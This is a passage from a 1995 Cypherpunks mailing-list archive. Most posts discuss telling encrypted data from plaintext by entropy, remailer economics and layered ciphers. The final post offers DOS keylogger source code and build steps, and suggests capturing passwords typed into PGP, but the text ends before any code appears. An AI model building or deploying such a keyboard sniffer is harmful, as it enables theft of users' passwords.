liberty, or property, without due process of law; nor shall private propety be taken for public use, without just compensation. The last sentence is the most commenly broken aspect of this amendment. A strong case could be made that breathalyzer, blood tests, and such also violate the spirit and letter of this article. Article VI (1791) In all criminal procecutions, the accused shall enjoy the right to a speedy and public trial, by an impartial jury of the State and district wherein the crime shall have been committed, which district shall have been previously ascertained by law, and to be informed of the nature and cause of the accusation; to be confronted with the witnesses against him; to have compulsory process for obtaining witnesses in his favor, and to have the assisstance of counsel for his defence. Seems to me that according to this anonymouse witnesses should not be allowed in any case. Since he also has a right to a public trial the court does not have the power to exclude the press or public. Article IX (1791) The enumeration in the Constitution, of certain rights shall not be construed to deny or disparage others retained by the people. This article states quite clearly and simply that if there is any doubt as to whether it is a right the resolution shall be found in favor of the people. Article X (1791) The powers not delegated to the United States by the Constitution, nor prohibited by it to the States, are reserved to the States, or to the people. This article states clearly that if it isn't in this document the federal government has no claim to it. The only way they may get such powers is through due process, namely constitutional amendments. From paul at hawksbill.sprintmrn.com Wed Jan 11 16:47:14 1995 From: paul at hawksbill.sprintmrn.com (Paul Ferguson) Date: Wed, 11 Jan 95 16:47:14 PST Subject: Internet World on Net Security In-Reply-To: <199501112240.RAA11895@pipe1.pipeline.com> Message-ID: <9501120046.AA25595@hawksbill.sprintmrn.com> > > The entire issue of Internet World of February, 1995, is about Internet > security, digital cash, encryption, firewalls and more. Here's the > contents: > Most of them were _very_ cursory, geared more towards the neophyte. In fact, some of them were actually misleading, especially the article on firewalls. - paul _______________________________________________________________________________ Paul Ferguson US Sprint tel: 703.689.6828 Managed Network Engineering internet: paul at hawk.sprintmrn.com Reston, Virginia USA http://www.sprintmrn.com From mccoy at io.com Wed Jan 11 17:00:07 1995 From: mccoy at io.com (Jim McCoy) Date: Wed, 11 Jan 95 17:00:07 PST Subject: Storm Signals In-Reply-To: <199501112337.PAA20199@jobe.shell.portal.com> Message-ID: <199501120100.TAA16301@pentagon.io.com> >From some anonymous dude: > > > > Military action also requires political will, and with the recent change > > in power in the US govt there is no way anything is going to happen for at > > least six months. Freshmen congressmen do not sign off on a war the first > > > True. But clandestine operations don't require the approval of > Congress. In fact, the prez never has to admit they exist. Ever. Read > the Pentagon Papers. The president needs the approval of the ranking members of the Senate Intelligence Oversight committee (I think that is the one), and there is at least one republican among them... Anyway, several thousand Green Berets does not a clandestine operation make. Secret wars are a bitch to pull off, and with a president with the lack of backbone such as Clinton they are not going to happen in the next two years. jim From marko at millcomm.com Wed Jan 11 19:05:20 1995 From: marko at millcomm.com (Mark Oeltjenbruns) Date: Wed, 11 Jan 95 19:05:20 PST Subject: How do I know if its encrypted? Message-ID: I keep seeing the idea that to keep out of trouble remailers and Data Havens should require that data be encrypted before it is accecpted. My question is how do I know it is encrypted? If I say that anyone sending me data to be massaged by my system must first encrypt it, how do I know they are in fact complying with that request? After all this is the area for the paranoid's to hang out in. I see some possible options. Most don't seem to workable. I could ... (1) Look at the incomming data, which of course would be impractical and defeat the whole idea. (2) Force them to pgp it, but that could be defeated by having enough of a pgp sig. that my system is fooled. Not to mention they must use *MY* idea of what good encryption is. After all I could say you must use my encryption software that has a backdoor I know of, i.e. clipper, or that costs money and can only be bought from me. This last point would be one way of making sure you made some money, but does seem impractial. (3) Peform a histogram analysis on it, if it doesn't pass a certain threshold reject the whole thing. Although cute, I don't like this one. (4) Encrypt it with my own key and decrypt it before squirting it back out. This doesn't seem to gain me anything though since it could be said that I still have the ability to look at the data. (5) Only acecpt data from a remailer or other service that would be guranteed to be encrypted. This seems like it would lead to a 'good ole boy' network that could exclude service providers it doesn't like. etc. etc. Whos to say that the data isn't encrypted? I could be hidding a real message in that eagale spread of a porn picture. 'Simple, don't allow porn but only accecpted images.' Well that certainly sounds like a can of worms waiting to squirm around your toes. Is the question of what is encrypted data similar to what material is porn or some other 'evil' data? Am I missing something in this simple requirment of only dealing with encrypted data? Or am I simply blowing something way out of proportion? -Mark ---------- Mark Oeltjenbruns marko at Millcomm.com N0CCQ SnipIt Research Finger for PGP key. 'My other key is 2048 bits.' From crunch at well.sf.ca.us Wed Jan 11 19:17:34 1995 From: crunch at well.sf.ca.us (John Draper) Date: Wed, 11 Jan 95 19:17:34 PST Subject: Finally got on Message-ID: <199501120317.TAA07919@well.sf.ca.us> I finally got on... I actually didn't get that swamped, but certainly I couldn't be expected to know that cypherpunks-request was defunkt. Oh well. Now that I'm on, I was wondering if anyone would let me know the status of Phil Zimmerman's case, and where I can xtract any info. I've heard reports that the Govt. was planning to press charges. Just getting back on here again, I'm not in the know of these things, but can now handle large amounts of mail. I'm also interested in knowing how I can help in Phil's defence case. Where do people mail checks to Phil's defence fund? Anyway, glad to be back up here again.... And a big fat HAPPY NEW YEAR to all of you Cypherpunk folks!! And Oh Yea!! Hi Brad, glad to make your acquaintence... Yup! The WELL was sure hosed today.... I'm just now getting mail thats backed up now for the 4 days I've been without power. There is ONE disadvantage of living out in the country.... Power can be a tad flakey. We've just got our power turned on today.... Yay!!! When I returned from MacWorld, things were really dark up here. :-) Cheers C. Crunch PS = Scuse the formatting, I STILL cannot get Microphone to not automatically word wrap. From tcmay at netcom.com Wed Jan 11 19:55:31 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 11 Jan 95 19:55:31 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501120337.TAA13574@netcom6.netcom.com> Mark Oeltjenbruns wrote: > I keep seeing the idea that to keep out of trouble remailers and > Data Havens should require that data be encrypted before it is accecpted. > My question is how do I know it is encrypted? If I say that anyone sending > me data to be massaged by my system must first encrypt it, how do I know > they are in fact complying with that request? After all this is the area > for the paranoid's to hang out in. > (1) Look at the incomming data, which of course would be impractical and > defeat the whole idea. Actually, no. If the remailed material is encrypted, then looking at it is harmless. (And if it is not....) The "ideal mix" neither looks at nor keeps records about remailed items, of course. The "nonideal mix" may easily insist on encryption. I won't go through the rest of the points here, but there's a key word here: entropy. Get familiar with it now (and not just 50 years from now, when the worms and the bacteria will be giving lectures). Abstractly, it is not possible to ever prove that a file is either encrypted or unencrypted. Practically, encrypted files have high entropy per character (characters appear with approximately equal frequency), while unencrypted files have relatively low entropy, reflecting the patterns and n-tuple clusterings in ordinary languages. Sophisticated entropy measures are available, and have been discussed here. But there's an easier approach: try to compress the file. An encrypted ( = high entropy) file will generally not compress, and may even expand in size. An ordinary message in English or Dutch or whatever, such as this one, will compress significantly, to perhaps half it's uncompressed size. (Quibblers, this is the place where your announce the precise compression seen...) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From spam at telerama.lm.com Wed Jan 11 20:31:23 1995 From: spam at telerama.lm.com (Steve Marting) Date: Wed, 11 Jan 95 20:31:23 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <3f2ba8$jbe@asia.lm.com> In article , Mark Oeltjenbruns wrote: > I keep seeing the idea that to keep out of trouble remailers and >Data Havens should require that data be encrypted before it is accecpted. >My question is how do I know it is encrypted? If I say that anyone sending >me data to be massaged by my system must first encrypt it, how do I know >they are in fact complying with that request? After all this is the area >for the paranoid's to hang out in. > > I see some possible options. Most don't seem to workable. I could >... [...] >(2) Force them to pgp it, but that could be defeated by having enough of a >pgp sig. that my system is fooled. Not to mention they must use *MY* idea >of what good encryption is. After all I could say you must use my >encryption software that has a backdoor I know of, i.e. clipper, or that >costs money and can only be bought from me. This last point would be one >way of making sure you made some money, but does seem impractial. You're being contradictory here. First you say that you have no way of reliably knowing if it's PGP encrypted, then you say it forces them to use a certain type of encryption. Well, if they can fool your system, they aren't forced to use it! But that's not really my point. I think this method is very valid and could be used in the Real World (well, on the net, at least). Let's say you require everyone to use PGP. Well, if I don't trust PGP but I trust SpamCrypt, there is nothing stopping me from encrypting my data with SpamCrypt and THEN PGP and sending it off to your haven. You see the data is PGP-encrypted, you don't have the PGP key to decrypt it so you can't be accused of having the ability to look at my data, and - correct me if I'm wrong here - unless there's some specific mathematical relation between PGP and SpamCrypt, my encryption is as good as the STRONGEST layer. In fact, as you suggest, this is a good way to implement a pay-per-use haven. All you have to do is only let people use your proprietary data format. You can either sell just the program (a one-time fee, like selling accounts on your haven), or sell single-use keys. Single-use keys are not only a type of one-time pad (again, I may be wrong there), but can be presold in arbitrary lots so companies can buy many keys from you and resell them. >(5) Only acecpt data from a remailer or other service that would be >guranteed to be encrypted. This seems like it would lead to a 'good ole >boy' network that could exclude service providers it doesn't like. >etc. etc. I don't see the problem with this. You will end up with two types of havens - those that will accept data from a remailer anyone can use (or from a remailer that will accept data from one somewhere down the line) and those that won't. The former are free for anyone to use, and the latter aren't. Sound like the difference between moderated and unmoderated newsgroups? And I don't hear anyone on cypherpunks bitching about the evil of moderated newsgroups. What would be wrong with setting up a haven just for you and your friends? Or anyone but Detweiler? Or anyone but me? Waiting to be called from some mistake, -Spam -- -- Spam is: Steve Marting My homepage Beer status: Pilsener bottled and aging From jdwilson at gold.chem.hawaii.edu Wed Jan 11 20:47:48 1995 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Wed, 11 Jan 95 20:47:48 PST Subject: Storm Signals Message-ID: <199501120452.XAA17600@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > Frankly, I'm quite puzzled by these signs. I can't think of any country that > seems due for a quick invasion by the USG, but the increase in granularity of > the GPS information suggests an operation of greater magnitude than just a > strike against terrorists, drug cartels etc. The normal clear transmission mode of GPS is intentionally "granulated." It was during ODS that the "granularity" was turned off rather than on. This was to allow them to purchase commercial GPS equipment for use in the Gulf theater. It could simply be a return to that standard mode. - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxS1iSoZzwIn1bdtAQHrdQGA4SP5Eawy54J11nCmwI2WzbYPojKeM8S+ gE1DtpEO025SZ7JsBcgoXFBdllLHclvZ =Nl9j -----END PGP SIGNATURE----- From eric at remailer.net Wed Jan 11 20:51:57 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 11 Jan 95 20:51:57 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501120450.UAA29781@largo.remailer.net> My question is how do I know it is encrypted? Calculate an entropy measure of some sort. Entropy is a measure of disributional skew. Maximum entropy means minimum skew. For human-readable text of any sort, the monogram entropy, i.e. the entropy of individual characters, will _always_ be detectably less than maximal. Encrypted text will always be near maximal. The two are easy to distinguish. ASCII-armored encrypted text will always be right at 6 bits per byte. For speed of implementation, you don't need even to look at much text. You can get a statistically significant measure quite quickly from the first couple of kilobytes. And since you're only really worried about detecting non-randomness, you don't even need to calculate the exact entropy but rather an approximation of it. This approximation can be done with entirely fixed point arithmetic, if you're a bit clever about it. A practical system would cut out a notch at 6/8 for ASCII armor, which would make approximation techniques a bit tricky. More practical is just to detect ASCII armor with a regular expression recognizer and de-armor it before the entropy check. Eric From eric at remailer.net Wed Jan 11 20:57:42 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 11 Jan 95 20:57:42 PST Subject: Remailing pricing and cover traffic In-Reply-To: <199501120004.QAA24479@jobe.shell.portal.com> Message-ID: <199501120456.UAA29793@largo.remailer.net> From: Pierre Uszynski Let me try to deal with the first two to conclude that many professionally run remailers may very well stay free or close to that for a long time: [summary: cross-subsidies for hiding another businesses] Cross-subsidies are common in other industries, why not in privacy provision? No particular reason why that won't happen. Nevertheless, the remailer is getting paid for one way or another. In addition, virtual link encryptors to some other commercial remailer may be a better way of providing cover traffic. It is refreshing, though, to see thoughtful discussion about alternate economic arrangements. The twin requirements of supporting the physical remailer and preventing swamping do not immediately and necessarily lead to pay-per-use. Eric From eric at remailer.net Wed Jan 11 21:04:05 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 11 Jan 95 21:04:05 PST Subject: Multiple symetric cyphers In-Reply-To: <199501112303.SAA14726@bb.hks.net> Message-ID: <199501120502.VAA29808@largo.remailer.net> From: cactus at seabsd.hks.net (L. Todd Masco) I'm wondering: would the strength be increased by using a randomly selected symetric cypher? Strength is not right aspect. Global risk is reduced, simply because the aggregate cost of a breach is reduced. But selecting a single cipher is just as much a fixed policy as a randomly selected one is. Far better to let the user pick a policy, both about sent and accepted ciphers. I guess this reduces to: do strong cyphers have "signatures" of some sort, by which the type of encryption can be derived? If they do, they're likely not _strong_ ciphers. Eric From eric at remailer.net Wed Jan 11 21:07:27 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 11 Jan 95 21:07:27 PST Subject: Why use plastic for remailers and DH? In-Reply-To: Message-ID: <199501120505.VAA29815@largo.remailer.net> From: Angus Patterson This point may have been raised before, but anyway, unless you're using a swiss-bank issued credit card [etc. ...], why would anybody want to use something as completely traceable as a credit card to pay for a remailer or a data haven? Because not everyone needs paranoid levels of security. Just because the truly paranoid won't use a service doesn't make it useless. Vebum sapienti... Eric From carolb at barton.spring.com Wed Jan 11 21:08:43 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Wed, 11 Jan 95 21:08:43 PST Subject: Storm Signals In-Reply-To: <199501110911.DAA05932@pentagon.io.com> Message-ID: A paratrooper girl named Christina, had just finished paratrooper school at Ft. Bragg. She was headed to Mpls, right around Hallowween. Then we didn't hear from her for almost a month. Then came the Panama, troop action, over the Haitian refugees. She didn't get picked, so they let her come to Mpls, finally. If something goes quiet, you can be sure something's up. I'd start betting on a Cuban thing first, as Castro isn't getting any younger. The U.S. needs the insurgent people in Cuba rather than having them over here. That's my "guess". RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From pstemari at erinet.com Wed Jan 11 21:23:22 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 11 Jan 95 21:23:22 PST Subject: Getting on the list Message-ID: <9501120515.AB10649@eri.erinet.com> At 06:57 PM 1/11/95 EST, Paul J. Ste. Marie wrote: (something I didn't mean to send out to cypherpunks) Sorry. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From jamesd at netcom.com Wed Jan 11 21:29:13 1995 From: jamesd at netcom.com (James A. Donald) Date: Wed, 11 Jan 95 21:29:13 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: On Wed, 11 Jan 1995, Mark Oeltjenbruns wrote: > (3) Peform a histogram analysis on it, if it doesn't pass a certain > threshold reject the whole thing. Although cute, I don't like this one. Why not -- sounds cool to me. It is also very fast, and does not take much programming. It will stop all cleartext. Probably some pictures would get through, so it would not stop mailbombings, but a volume limitation per apparent user and apparent destination would stop mailbombings. A volume limitation sounds like a lot of work to program though. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we http://nw.com/jamesd/ are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com From pstemari at erinet.com Wed Jan 11 21:29:38 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 11 Jan 95 21:29:38 PST Subject: How do I know if its encrypted? Message-ID: <9501120521.AA10718@eri.erinet.com> At 07:37 PM 1/11/95, Timothy C. May wrote: > ... (Quibblers, this is the place where your announce the precise compression > seen...) PKZIP (R) FAST! Create/Update Utility Version 2.04g 02-01-93 Copr. 1989-1993 PKWARE Inc. All Rights Reserved. Shareware Version PKZIP Reg. U.S. Pat. and Tm. Off. Patent No. 5,051,745 _ 80386 CPU detected. _ EMS version 4.00 detected. _ XMS version 2.00 detected. _ DPMI version 0.90 detected. _ Using Normal Compression. Creating ZIP: MAY.ZIP Adding: MAY.TXT Deflating (49%), done. A pretty good guess, actually. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From daleh at ix.netcom.com Wed Jan 11 21:41:55 1995 From: daleh at ix.netcom.com (Dale Harrison AEGIS) Date: Wed, 11 Jan 95 21:41:55 PST Subject: How do I know if its encrypted? Message-ID: <199501120540.VAA11357@ix3.ix.netcom.com> You wrote: > > My question is how do I know it is encrypted? > >Calculate an entropy measure of some sort. Entropy is a measure of >disributional skew. Maximum entropy means minimum skew. > >For human-readable text of any sort, the monogram entropy, i.e. the >entropy of individual characters, will _always_ be detectably less >than maximal. Encrypted text will always be near maximal. The two >are easy to distinguish. ASCII-armored encrypted text will always be >right at 6 bits per byte. > >For speed of implementation, you don't need even to look at much text. >You can get a statistically significant measure quite quickly from the >first couple of kilobytes. > >And since you're only really worried about detecting non-randomness, >you don't even need to calculate the exact entropy but rather an >approximation of it. This approximation can be done with entirely >fixed point arithmetic, if you're a bit clever about it. > >A practical system would cut out a notch at 6/8 for ASCII armor, which >would make approximation techniques a bit tricky. More practical is >just to detect ASCII armor with a regular expression recognizer and >de-armor it before the entropy check. > >Eric > > Won't work! You can always embed an encrypted message in what 'looks' like plaintext. A trivial example: Encrypt a message with a caesar cypher, then build a story where the first char of each word maps to each subsequent char from the encrypted text. At the cost of expanding the size of the message by a factor of 5 to 10 you've hidden the encrypted message in what looks like a letter to your mother (or a news story in the NY Times, etc.) This is old technique. Dale H. From jrochkin at cs.oberlin.edu Wed Jan 11 22:00:26 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Wed, 11 Jan 95 22:00:26 PST Subject: How do I know if its encrypted? Message-ID: At 12:40 AM 01/12/95, Dale Harrison (AEGIS wrote: >Won't work! You can always embed an encrypted message in what 'looks' >like plaintext. A trivial example: Encrypt a message with a caesar >cypher, then build a story where the first char of each word maps to >each subsequent char from the encrypted text. At the cost of expanding >the size of the message by a factor of 5 to 10 you've hidden the >encrypted message in what looks like a letter to your mother (or a news >story in the NY Times, etc.) This is old technique. The context this was being discussed in, was trying to make _plaintext_ look like _ciphertext_. The operator of a data haven or remailer might hypothetically want to ensure that all text he dealt with was encrypted. So your method wouldn't do anything in that area. Unless you can think of a way to embed plaintext in ciphertext in such a way that it looks like ciphertext, and my guess is that any method that did that well would be sufficiently obscure as to be analagous to encryption for our purposes. Really bad encryption, with very little point, but still hidden text. Which is the real point, the operator doesn't want to deal with any text that isn't "hidden" in some way. Of course, we're not just dealing with text. So the scheme has got to be changed a bit so as to be able to detect unencrypted GIFs, and mu-law files, and as yet to be determined unknown files. I don't know enough about what's being talked about to know if this entropy detecting stuff will generalize to non text files. Cause we want to catch unencrypted GIFs too. [And doesn't compression alone do similar things to the entropy as encryption does, anyhow? If someone compresses their file with a good compression algorithm, as I understand it the non-randomness left will be pretty low. But it won't meet the needs we're discussing, I don't think.] From cactus at seabsd.hks.net Wed Jan 11 22:02:54 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Wed, 11 Jan 95 22:02:54 PST Subject: Multiple symetric cyphers Message-ID: <199501120607.BAA19021@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article <199501120502.VAA29808 at largo.remailer.net>, Eric Hughes wrote: > From: cactus at seabsd.hks.net (L. Todd Masco) > > I'm wondering: would the strength be increased by using a randomly selected > symetric cypher? > >Strength is not right aspect. Global risk is reduced, simply because >the aggregate cost of a breach is reduced. Isn't it? If an attacker does not know what cipher is used and breaking each is computationally expensive (though not prohibitively so) doesn't that add extra complexity? IE, if cipher A, B, and C are attackable in large but not prohibitive time, wouldn't an attacker have to spend more cycles to break something that was randomly one of those? I agree that it's not a significantly large jump, but if an attacker has to go through all the possibilities for A, B, before breaking something in C, it seems that there's a small increase in strength (Not being argumentative, really... I understand that this increase in strength isn't enough to warrant any significant effort. Just want to clarify the answer in my mind). >But selecting a single cipher is just as much a fixed policy as a >randomly selected one is. Far better to let the user pick a policy, >both about sent and accepted ciphers. Sure. Ideally, a user could say "use A" or "use randomly A, C, or D" or even "use A_x(C_x) or B_x(D_y)". I'm not certain the "accept" is a great idea, but what the hell... any theoretical general system should have support for such a decision to be made, right? As failure modes multiply... > I guess this reduces to: do strong cyphers have "signatures" of some sort, > by which the type of encryption can be derived? > >If they do, they're likely not _strong_ ciphers. Great... that's the answer I was looking for, and what my gut feeling was. I'm trying to determine how much rope is too much for a first pass. Related: is there, in general or in any known specific cases, any loss of security in using sym. cipher A on ciphertext B (of another sym. cipher) with the same key? With different keys (I would think not, but I vaguely remember mention of something here long ago)? - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLxSMSBNhgovrPB7dAQECKQP/fqXwOcRmH6Z5dm8fsDnFzkCNyy5bc7Os +/hWmyjlk6/qx2Ym0gvlIZaxMSVR68E1qQUaoiAaWY7SatskU8o6dZRI+SmON4NV qSZnBh/+TnQwcTK0c0N+4m3Y8GhIk0ERX9modZfadv15Q07yfP7MXEj4yRQOse6e WHmUg0WOhW4= =GedZ - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxTHISoZzwIn1bdtAQEUbAGAuX+ALOTHZkUd8vqsWzVZWKSKwnJ+03yW alp18VGBGaM4PLQWU0OAFmbBP8wUxBEz =U5tO -----END PGP SIGNATURE----- From carolb at barton.spring.com Wed Jan 11 22:09:43 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Wed, 11 Jan 95 22:09:43 PST Subject: Microsoft TrueName (tm) Message-ID: Praise Bob! The Rev. Ivan Stang's been preaching that for years! Long live the Slackmaster! RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From eric at remailer.net Wed Jan 11 22:09:55 1995 From: eric at remailer.net (Eric Hughes) Date: Wed, 11 Jan 95 22:09:55 PST Subject: How do I know if its encrypted? In-Reply-To: <199501120540.VAA11357@ix3.ix.netcom.com> Message-ID: <199501120608.WAA29936@largo.remailer.net> From: daleh at ix.netcom.com (Dale Harrison (AEGIS)) Won't work! You can always embed an encrypted message in what 'looks' like plaintext. So people can write special software that gets their message rejected by an entropy filter. This is a disadvantage? It looks like an irrelevancy to me. Seems to me that a quite reasonable condition of use of a remailer is that what is passed isn't human readable. Eric From craig at passport.ca Wed Jan 11 22:19:35 1995 From: craig at passport.ca (Craig Hubley) Date: Wed, 11 Jan 95 22:19:35 PST Subject: Reefer madness In-Reply-To: <199501112303.SAA14349@pipe1.pipeline.com> Message-ID: Seems to me I have seen something like this cybersmut hype before... wasn't it called 'Reefer Madness'? Craig From daleh at ix.netcom.com Wed Jan 11 22:32:15 1995 From: daleh at ix.netcom.com (Dale Harrison AEGIS) Date: Wed, 11 Jan 95 22:32:15 PST Subject: How do I know if its encrypted? Message-ID: <199501120631.WAA27345@ix2.ix.netcom.com> You wrote: > >The context this was being discussed in, was trying to make _plaintext_ >look like _ciphertext_. The operator of a data haven or remailer might >hypothetically want to ensure that all text he dealt with was encrypted. >So your method wouldn't do anything in that area. The discussion was one of whether you could distinguish plaintext from cyphertext by doing a statitical analysis of the datastream, i.e. can you tell one from the other without actually reading each message. The answer is no. Dale H. From daleh at ix.netcom.com Wed Jan 11 22:47:38 1995 From: daleh at ix.netcom.com (Dale Harrison AEGIS) Date: Wed, 11 Jan 95 22:47:38 PST Subject: How do I know if its encrypted? Message-ID: <199501120646.WAA28573@ix2.ix.netcom.com> You wrote: >So people can write special software that gets their message rejected >by an entropy filter. This is a disadvantage? It looks like an >irrelevancy to me. > It's an artificial example, but one that points out that merely doing a frequency analysis on the datastream isn't enough to guantee the correct answer. Reliable remailer software will have to worry about false postives as well as false negatives; especially if it's a fee-for-service operation. This might also be a nice feature if you're trying to dodge an NSA filter. >Seems to me that a quite reasonable condition of use of a remailer is >that what is passed isn't human readable. > Of course the implicit assumption in that statement is that encrypted traffic hasn't been outlawed or regulated, or that the sender doesn't want to 'appear' to be sending encrypted traffic. From carolb at barton.spring.com Wed Jan 11 22:47:59 1995 From: carolb at barton.spring.com (Censored Girls Anonymous) Date: Wed, 11 Jan 95 22:47:59 PST Subject: Finally got on In-Reply-To: <199501120317.TAA07919@well.sf.ca.us> Message-ID: Hope the information, under seperate cover did the job. RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM From tcmay at netcom.com Wed Jan 11 22:49:51 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 11 Jan 95 22:49:51 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501120648.WAA12523@netcom5.netcom.com> Jonathan Rochkind wrote: > The context this was being discussed in, was trying to make _plaintext_ > look like _ciphertext_. The operator of a data haven or remailer might > hypothetically want to ensure that all text he dealt with was encrypted. > So your method wouldn't do anything in that area. Unless you can think of > a way to embed plaintext in ciphertext in such a way that it looks like > ciphertext, and my guess is that any method that did that well would be As I said in a recent message, there is no general way to "prove" that a file is encrypted, only to have pretty good confidence that it is. (This is at the core of algorithmic information theory, a la Kolmogorov and Chaitin, goes to the heart of what is meant by "randomness," and is linked as well to the halting problem and other such stuff.) I had a need to actually do what Jonathan is talking about: make a file look like it was encrypted but actually have a simple text message in it. My application was an experiment to bait the line for some thought policemen who decided that they would decide which pictures were approprate and which were not. So, I created a plausible-looking PGP-like file and posted it to the new group "alt.binaries.pictures.erotica.children" and announce that an "interesting" picture existed there. The squeals of the net.cops were impressive to behold! Demands to Netcom that I be expelled from the Net, that the "Child Welfare Agents" would soon be breaking down my doors, etc. But, given the climate of our time (this was in July 1993) and given the potential failure of the "It's not a _real_ file" defense, I protected myself in any easy way, but running an English message down the diagonal, saying something like "This is not a real encrypted file," etc. Even a lawyer would have to admit that no real encrypted file could have English emerging randomly. Entropy, and all that. So, this was an ostensibly encrypted file which contained unencrypted text. It would very likely have passed any tests for "randomness" and hence would have been passed by any "encrypted only" filters. (The English text was a tiny fraction of the entire file, so the deviation from near-maximal entropy would likely go undetected. Fluctuations would be larger, depending on file size.) Nobody spotted the message. After several days, I "let the truth be told," which of course enraged others. I though this digression might be amusing to some. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From daleh at ix.netcom.com Wed Jan 11 22:51:52 1995 From: daleh at ix.netcom.com (Dale Harrison AEGIS) Date: Wed, 11 Jan 95 22:51:52 PST Subject: How do I know if its encrypted? Message-ID: <199501120650.WAA28898@ix2.ix.netcom.com> You wrote: >So people can write special software that gets their message rejected >by an entropy filter. This is a disadvantage? It looks like an >irrelevancy to me. > It's an artificial example, but one that points out that merely doing a frequency analysis on the datastream isn't enough to guantee the correct answer. Reliable remailer software will have to worry about false postives as well as false negatives; especially if it's a fee-for-service operation. This might also be a nice feature if you're trying to dodge an NSA filter. >Seems to me that a quite reasonable condition of use of a remailer is >that what is passed isn't human readable. > Of course the implicit assumption in that statement is that encrypted traffic hasn't been outlawed or regulated, or that the sender doesn't want to 'appear' to be sending encrypted traffic. From m00012 at KANGA.STCLOUD.MSUS.EDU Wed Jan 11 23:02:56 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Wed, 11 Jan 95 23:02:56 PST Subject: keyboard sniffer TSR source code... Message-ID: <0098A540.BC444360.1303@KANGA.STCLOUD.MSUS.EDU> For Dos operating systems. I wrote this in a weekend, and no longer wish to work with it. I will release it as is....do not ask for support, and if you know where I work, they have no idea I am doing this, so don't make any assumptions about my company's software. But, here it is, the source code for a keyboard sniffer program. After you assemble it, link it, turn it into a .com file, and execute it, just hit page up for a display of the first half of the buffer, and page down for a display of the second half of the buffer. Then, test it out with pgp or other dos based programs that ask you for a password (use a fake one), and you will probably see how insecure most of these programs are. Mike -----cut here---- ; Keyboard sniffer TSR ; ; asm kbs.asm ; link kbs.obj ; exe2bin kbs kbs.exe ; ;Notes: This is a keyboard sniffer program. It is intended to ; show how easy it is to make your computer insecure. ; This program hooks itself to the keyboard interrupt routine. ; It is not difficult to imagine a routine that simply replaced ; the keyboard interrupt routine, or simply monitored the ; keyboard buffer and pointers from another interrupt routine, ; e.g., the timer 